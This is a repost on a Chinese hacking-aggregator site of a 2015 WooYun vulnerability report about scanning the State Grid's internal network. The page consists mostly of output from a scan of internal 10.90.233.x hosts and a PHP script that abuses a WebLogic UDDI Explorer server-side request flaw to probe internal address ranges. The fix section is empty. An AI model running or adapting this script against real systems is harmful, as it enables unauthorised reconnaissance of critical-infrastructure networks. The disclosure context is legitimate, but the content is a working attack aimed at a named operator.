记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

我是如何用某漏洞扫描国家电网内网的

2015-10-02 10:15

code 区域
http://10.90.233.19/ FUck closed

http://10.90.233.20/ FUck closed

http://10.90.233.21/ FUck closed

http://10.90.233.22/ FUck closed

http://10.90.233.23/ FUck closed

http://10.90.233.24/ FUck closed

http://10.90.233.25/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.25/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.26/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.26/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.27/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.27/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.28/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.28/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.29/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.29/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.30/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.30/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.31/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.31/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.32/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.32/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.33/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.33/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.34/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host

http://10.90.233.35/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host

http://10.90.233.36/ FUck closed

http://10.90.233.37/ FUck closed

http://10.90.233.38/ FUck closed

http://10.90.233.39/ FUck closed

http://10.90.233.40/ FUck closed

http://10.90.233.41/ FUck closed

http://10.90.233.42/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host

http://10.90.233.43/ FUck closed

http://10.90.233.44/ FUck closed

http://10.90.233.45/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host

http://10.90.233.46/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.46/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.47/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.47/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.48/ FUck closed

http://10.90.233.49/ FUck closed

http://10.90.233.50/ FUck closed

http://10.90.233.51/ FUck closed

http://10.90.233.52/ FUck closed

http://10.90.233.53/ FUck closed

http://10.90.233.54/ FUck closed

http://10.90.233.55/ FUck closed

http://10.90.233.56/ FUck closed

http://10.90.233.57/ FUck closed

http://10.90.233.58/ FUck closed

http://10.90.233.59/ FUck closed

http://10.90.233.60/ FUck closed

http://10.90.233.61/ FUck closed

http://10.90.233.62/ FUck closed

http://10.90.233.63/ FUck closed

http://10.90.233.64/ FUck closed

http://10.90.233.65/ FUck closed

http://10.90.233.66/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.66/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.67/ FUck closed

http://10.90.233.68/ FUck closed

http://10.90.233.69/ FUck closed

http://10.90.233.70/ FUck closed

http://10.90.233.71/ FUck closed

http://10.90.233.72/ FUck closed

http://10.90.233.73/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.73/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.74/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.74/ which did not have a valid SOAP content-type: text/html.

http://10.90.233.75/ FUck closed

漏洞证明:

2222.png





code 区域
cat web.php 

<?php

for($m=233;$m<250;$m++){

for($i=1;$i<254;$i++){



$url="http://10.90.$m.".$i."/";

expyou($argv[1],$url);

}

}



expyou($argv[1],$argv[2]);



function expyou($target,$url){





$result=file_get_contents("$target/uddiexplorer/SearchPublicRegistries.jsp?operator=$url&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search");

preg_match_all("#An error has occurred<BR>(.*?)</table#is",$result,$info);



if(strpos($info[1][0],"but could not connect over HTTP to server")){

echo "$url FUck closed\r\n";

}else{

echo $url.trim($info[1][0])."\r\n";

}



}

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0134123

阅读:390730 | 评论:0 | 标签:扫描 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“我是如何用某漏洞扫描国家电网内网的”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云